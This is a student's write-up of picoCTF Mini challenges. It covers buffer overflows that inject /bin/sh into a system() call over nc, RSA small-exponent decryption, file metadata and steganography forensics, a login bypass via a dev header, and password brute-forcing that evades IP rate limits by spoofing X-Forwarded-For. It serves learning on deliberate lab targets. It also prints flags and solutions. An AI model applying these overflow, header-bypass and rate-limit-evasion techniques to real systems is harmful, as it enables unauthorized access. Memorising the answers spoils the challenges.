picoCTF Mini by CMU-Africa Writeup

Published on 2025-12-13

picoCTF Mini by CMU-Africa

I taking the Computer Security course this semester, which requires me to participate in any public CTF. Among all the public CTFs, I attended PicoCTF because it's one of the most friendly CTFs for beginners. The difficulty of PicoCTF is much easier than the problems in the course homework, so I can solve them in short time. Besides, there are various kinds of problems, aside from the problems I solved in the course, there are some special problems that require checking the metadata of a file.

Writeup

Input Injection 1 

void fun(char *name, char *cmd) {
    char c[10];
    char buffer[10];

    strcpy(c, cmd);
    strcpy(buffer, name);

    printf("Goodbye, %s!\n", buffer);
    fflush(stdout);
    system(c);
}

fun executes the command c, we can overflow buffer to write our command (/bin/sh) to c.

  1. nc saffron-estate.picoctf.net <port>
  2. Input aaaaaaaaaa/bin/sh
  3. cat flag.txt

Input Injection 2 

int main(void) {
	char* username = malloc(28);
	char* shell = malloc(28);
	
	printf("username at %p\n", username);
    fflush(stdout);
	printf("shell at %p\n", shell);
    fflush(stdout);
	
	strcpy(shell, "/bin/pwd");
	
	printf("Enter username: ");
    fflush(stdout);
	scanf("%s", username);
	
	printf("Hello, %s. Your shell is %s.\n", username, shell);
	system(shell);
    fflush(stdout);
	
	return 0;
}

This is also a buffer overflow problem. Our goal is to overflow the username and then write /bin/sh to shell. From the output of the program, we know the address of shell is username+48, so we can get the flag like this:

  1. nc saffron-estate.picoctf.net <port>
  2. Input a*48 + "/bin/sh"
  3. cat flag.txt

Crack the Power

In message.txt, we see there are n, e, c and speculate that the flag is encrypted to c by RSA. Observe that e is only 20 and c is much smaller than n. So it is possible that m ^ e = c < N.

Therefore, we decimal search the value of m (flag) such that m ^ 20 = c.

from math import *

c = 640637430810406857500566702096274084170639990940796427452789530582646559503351994084630642819529512916638846054876997125498610672759860547044513026189155901787948484482403362927101626272687833687338975274586806476773521319051152565007700259664554159504729296349469197447878298780511371211790491139075259324198933821099017956702371413354628803295864874818977161515794899731393370464401493960680296137943038196051026420339668593694062087137688243381433212756006234063987908213474461679873772065186626550125172019387777864795077647708220020565875602005103342766617735797403630407673089294641211185784285212619751433812891114930402846218495033903895776530373162661788262770661056939054381211058086594610051339027542638474293177226685727990841844712534416552304889091929218453487599517664003095313175878470753143329804811225403499575412027738206715697431439846882937410842894303689755456370733764465958658500789630510555345208100742443149436428977702242274952026208528164224667869714848093393983835310607255359839284538944300791947123779789560912249158012656403415425561337179720951703957058384748262011159099547304088342818511440896654498113757280563601
# c has 1153 - 4 = 1149 digits

x = 0
e = 20
power = (1149 // e) + 1
step = 10 ** power

while (step > 0):
    print(f"{power = }")
    while x ** e <= c:
        x += step
    x -= step
    step //= 10
    power = power - 1

assert x**20 == c

print(x.to_bytes(24).decode())

Riddle Registry

There nothing we can know from the content of the PDF. Therefore, we turn to the metadata.

  1. exiftool confidential.pdf, we'll see the author name is strange and looks like base64 encoded string.
  2. echo cGljb0NURntwdXp6bDNkX20zdGFkYXRhX2YwdW5kIV9lZTQ1NDk1MH0= | base64 -d, then we'll get the flag.

Corrupted File

The file has some bytes corrupted according to the problem description. It is most likely that the corrupted bytes are the magic, otherwise it's very hard for us to recover the file.

  1. xxd file, then search for the file header FF E0 in Wikipedia and know it's JPEG.
  2. vim file and :%!xxd, correct the file header and :%!xxd -r then :wq.
  3. mv file file.jpg.
  4. Open the image and get the flag.

Flag in Flame

logs.txt contains displayable characters but not recognizable for human. Therefore we try to decode it with base64 and find that the file header indicate that it's a JPEG file.

  1. base64 -d -i logs.txt > logs.jpg, the text seems like a hex string.
  2. Copy the text in the image
  3. echo <text> | xxd -r -p

Hidden in plainsight

The image seems ordinary, so we check its metadata.

  1. `exiftool img.jpg | base64 -d.
  2. The output shows that the flag is hided with steghide
  3. First we decode the password echo cEF6endvcmQ= | base64 -d
  4. Then extract the flag steghide extract -sf img.jpg
  5. cat flag.txt

Log Hunt

The server.log seems random, but when we search pico, we find the first line is INFO FLAGPART: picoCTF{us3_. So we can search INFO FLAGPART to recover the whole flag.

  1. grep FLAGPART server.log
  2. Recover the flag.

Crack the Gate 1

  1. The first line of the body is a Caesar cipher: ABGR: Wnpx - grzcbenel olcnff: hfr urnqre "K-Qri-Npprff: lrf"
  2. Goto https://cryptii.com/pipes/caesar-cipher, input the ciphertext and tweak the shift such that the plaintext is human-readable, which is NOTE: Jack - temporary bypass: use header "X-Dev-Access: yes".
  3. Use Burp Suite to send the login request with header X-Dev-Access: yes. Then we will get the flag.

Crack the Gate 2

This website prevents a IP address from brute-forcing passwords, but we can still change our IP address to cheat the website by modifying the Forwarded-For: header.

  1. Login with the Burp browser
  2. Use repeater to send the login requests with header X-Forwarded-For: <ip>. <ip> should be different for every request.
  3. Among the passwords, Xpseyq9h is correct.